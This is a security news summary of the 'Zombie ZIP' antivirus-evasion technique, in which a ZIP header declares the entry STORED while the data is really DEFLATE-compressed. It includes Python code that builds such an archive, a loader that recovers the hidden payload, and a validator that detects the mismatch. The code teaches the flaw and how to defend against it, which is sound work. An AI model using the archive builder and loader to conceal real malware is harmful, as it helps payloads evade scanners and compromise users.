Malware & Ransomware · HIGH

Zombie ZIPs: New Trick Outsmarts Antivirus Software

CSO Online

Tags: Zombie ZIP, antivirus, malware, CVE-2026-0866, CERT/CC

In short: specially crafted "Zombie ZIP" archives can hide malware from antivirus scanners.

Quick Summary

A new technique called Zombie ZIP tricks antivirus software into missing malware hidden inside ZIP archives. Because nearly every antivirus product tested was fooled, almost all users are affected and their data is at risk. Treat ZIP files from unknown sources with caution, and delete any archive that fails to extract cleanly.

What Happened

A new cybersecurity threat has emerged, and it is called Zombie ZIP. The technique lets attackers hide malicious payloads inside compressed archives in a way that leads antivirus solutions to believe the files are safe. Developed by Chris Aziz of Bombadil Systems, the method exploits how antivirus programs interpret ZIP file headers.

When standard extraction tools such as WinRAR or 7-Zip process one of these specially crafted archives, they report errors or produce corrupt output, because the ZIP headers have been manipulated to mislead the software. Security tools, instead of flagging the file as suspicious, scan it as though it were an ordinary copy of the original data and find nothing. According to Aziz, 50 of the 51 antivirus products he tested, including Microsoft Defender, can be fooled this way.

The trick lies in how antivirus programs trust the "Method" field of a ZIP entry. If the field reads Method=0 (STORED), the scanner treats the entry's bytes as uncompressed raw data. In a Zombie ZIP, however, those bytes are actually DEFLATE-compressed, so the scanner sees only compressed noise and never matches a malware signature. The attacker then ships a small loader that ignores the header, decompresses the data anyway, and restores the malicious payload without ever being detected.

Why Should You Care

This is a big deal for anyone who uses a computer or mobile device. Imagine downloading a file that you think is safe, only to find out later that it was hiding malware all along. That could mean compromised personal data, financial loss, or even a full system takeover. Your antivirus software alone might not be enough to protect you.

Think of it like a magician’s trick. You see a box that looks empty, but there’s actually something hidden inside. Just like you wouldn’t trust an empty box, you shouldn’t blindly trust files, especially from unknown sources. If you encounter errors while extracting a ZIP file, it’s a red flag that you should not ignore.

What's Being Done

In response to this discovery, the CERT Coordination Center (CERT/CC) has issued a warning about Zombie ZIPs. It recommends that security tool providers take immediate action by:

  • Validating compression method fields against actual data.
  • Adding mechanisms to detect inconsistencies in archive structures.
  • Implementing stricter archive inspection modes.
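The header trick described above and CERT/CC's first recommendation (validating the Method field against the actual data) can both be shown on a single archive. The following is an added example written for this page; it is not code from the CSO Online article, from Bombadil Systems, or from any antivirus vendor. The file name, the marker string standing in for a signature, and the payload text are all constructed for the demo, and the function names are this example's own. It builds a one-entry ZIP by hand so that the local file header can declare STORED while the entry data is really raw DEFLATE, then runs four readers over it: a scanner that trusts the Method field, a loader that ignores it, Python's standards-following zipfile module, and a consistency check that uses the header's CRC-32 (which is always computed over the uncompressed file) as the arbiter of which interpretation is real.

```python
"""Zombie ZIP: a header that lies about the compression method, and a check for it.

Added example, not code from the original article or from Bombadil Systems.
The file name, payload and marker string below are constructed for this demo.
"""
import io
import struct
import zipfile
import zlib

PAYLOAD_NAME = "invoice.txt"                     # constructed
SIGNATURE = b"DEMO-SIGNATURE-MARKER"             # stand-in for an AV signature, constructed
PAYLOAD = (b"harmless text standing in for a malicious payload: " + SIGNATURE + b"\n") * 8

METHOD_STORED = 0
METHOD_DEFLATE = 8
LOCAL_SIG, CENTRAL_SIG, EOCD_SIG = 0x04034B50, 0x02014B50, 0x06054B50
LOCAL_FMT = "<IHHHHHIIIHH"   # the fixed 30-byte part of a local file header


def raw_deflate(data: bytes) -> bytes:
    c = zlib.compressobj(9, zlib.DEFLATED, -15)  # ZIP stores raw deflate, no zlib wrapper
    return c.compress(data) + c.flush()


def raw_inflate(data: bytes) -> bytes:
    return zlib.decompress(data, -15)


def build_zip(declared: int, actual: int) -> bytes:
    """Single-entry ZIP whose headers declare `declared` but whose data is encoded
    with `actual`. declared == actual is an honest archive; STORED declared over
    DEFLATE data is a Zombie ZIP."""
    data = raw_deflate(PAYLOAD) if actual == METHOD_DEFLATE else PAYLOAD
    crc = zlib.crc32(PAYLOAD) & 0xFFFFFFFF        # CRC-32 is always of the *uncompressed* file
    name = PAYLOAD_NAME.encode()
    local = struct.pack(LOCAL_FMT, LOCAL_SIG, 20, 0, declared, 0, 0,
                        crc, len(data), len(PAYLOAD), len(name), 0) + name
    central = struct.pack("<IHHHHHHIIIHHHHHII", CENTRAL_SIG, 20, 20, 0, declared, 0, 0,
                          crc, len(data), len(PAYLOAD), len(name), 0, 0, 0, 0, 0, 0) + name
    eocd = struct.pack("<IHHHHIIH", EOCD_SIG, 0, 0, 1, 1, len(central), len(local) + len(data), 0)
    return local + data + central + eocd


def first_entry(zip_bytes: bytes):
    """Walk the first local file header; return (declared method, header CRC, entry data)."""
    sig, _, _, method, _, _, crc, csize, _, nlen, elen = struct.unpack_from(LOCAL_FMT, zip_bytes, 0)
    if sig != LOCAL_SIG:
        raise ValueError("not a local file header")
    start = 30 + nlen + elen
    return method, crc, zip_bytes[start:start + csize]


def naive_scan(zip_bytes: bytes) -> bool:
    """Scanner that trusts the Method field: STORED means 'these bytes are the file'."""
    method, _, data = first_entry(zip_bytes)
    content = data if method == METHOD_STORED else raw_inflate(data)
    return SIGNATURE in content


def zombie_loader(zip_bytes: bytes) -> bytes:
    """Attacker-side loader: ignores the header and inflates whatever is there."""
    _, _, data = first_entry(zip_bytes)
    try:
        return raw_inflate(data)
    except zlib.error:
        return data


def standard_tool_extract(zip_bytes: bytes):
    """A standards-following extractor: trusts the header, then verifies the CRC-32."""
    try:
        with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
            return zf.read(PAYLOAD_NAME)
    except zipfile.BadZipFile:
        return None   # CRC mismatch: the 'stored' bytes are not the file they claim to be


def validate_method_field(zip_bytes: bytes) -> str:
    """CERT/CC's first recommendation: check the declared method against the data.
    The header CRC covers the uncompressed file, so it reveals which reading is real."""
    method, crc, data = first_entry(zip_bytes)
    crc_of = lambda blob: zlib.crc32(blob) & 0xFFFFFFFF
    if method == METHOD_STORED and crc_of(data) == crc:
        return "consistent"
    try:
        inflated = raw_inflate(data)
    except zlib.error:
        inflated = None
    if method == METHOD_DEFLATE and inflated is not None and crc_of(inflated) == crc:
        return "consistent"
    if method == METHOD_STORED and inflated is not None and crc_of(inflated) == crc:
        return "inconsistent: declared STORED but data is DEFLATE"
    return "inconsistent: data matches neither interpretation"


if __name__ == "__main__":
    honest = build_zip(METHOD_DEFLATE, METHOD_DEFLATE)
    zombie = build_zip(METHOD_STORED, METHOD_DEFLATE)
    print("honest: naive_scan", naive_scan(honest), "|", validate_method_field(honest))
    print("zombie: naive_scan", naive_scan(zombie), "|", validate_method_field(zombie))
    print("zombie loader recovers payload:", zombie_loader(zombie) == PAYLOAD)
    print("standard tool on zombie:", standard_tool_extract(zombie))
```

Running it shows the whole story in one place: the naive scanner finds the marker in the honest archive but not in the Zombie ZIP, the loader recovers the payload from the Zombie ZIP regardless, the standards-following extractor returns nothing because its CRC check fails (the "corrupt data" behaviour the article describes), and the validator reports the STORED/DEFLATE mismatch. The validator is deliberately cheap: one inflate attempt and two CRC-32 computations per entry, which is the kind of "stricter archive inspection mode" a scanner can afford on every archive.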

As a user, be cautious with archive files, especially those from unfamiliar senders. If extraction fails or produces an error message such as "unsupported method", delete the file rather than trying to recover its contents. Experts are monitoring the situation closely, since Zombie ZIPs could lead to a significant increase in successful malware attacks.


🔒 Pro insight: The Zombie ZIP technique highlights a critical gap in the trust model of antivirus file inspection: header fields that describe an archive's contents are taken at face value instead of being validated against the data they describe.

Original article from CSO Online

Related Pings

HIGH · Malware & Ransomware
SmartApeSG Campaign Deploys Remcos RAT via ClickFix Page
A new campaign is using a fake ClickFix page to spread Remcos RAT. Individuals and organizations are at risk of remote access and data theft. Stay vigilant and protect your systems from this growing threat.
Source: SANS ISC Full Text

HIGH · Malware & Ransomware
Ransomware Negotiator Allegedly Extorted Victims for Millions
A ransomware negotiator is accused of extorting victims for millions. DigitalMint claims ignorance of his actions. This scandal raises serious concerns about trust in cybersecurity professionals.
Source: SC Media

HIGH · Malware & Ransomware
New VENON Malware Targets Brazilian Banking Users
A new malware called VENON is targeting Brazilian banking users. This Rust-based threat employs advanced techniques to steal sensitive information. Stay alert and protect your accounts from this evolving danger.
Source: SC Media

HIGH · Malware & Ransomware
FBI Investigates Malware Spread Through Steam Games
The FBI is investigating malware hidden in Steam games. Gamers who installed these titles may have had their accounts compromised. If you played these games, report your experience to help the investigation.
Source: BleepingComputer

HIGH · Malware & Ransomware
Credential Theft: Storm-2561 Spoofs VPN Clients to Steal Logins
A new cybercrime group is spoofing VPN clients to steal user credentials. Cisco and Fortinet users are particularly at risk. Stay alert and ensure you're downloading software from official sources to protect your data.
Source: The Register Security

HIGH · Malware & Ransomware
Ransomware Responder Allegedly Aided BlackCat Cybercriminals
A cybersecurity responder allegedly aided BlackCat hackers in negotiating higher ransoms. This shocking breach of trust has raised alarms in the industry. DigitalMint has since terminated the involved parties and is enhancing oversight.
Source: The Record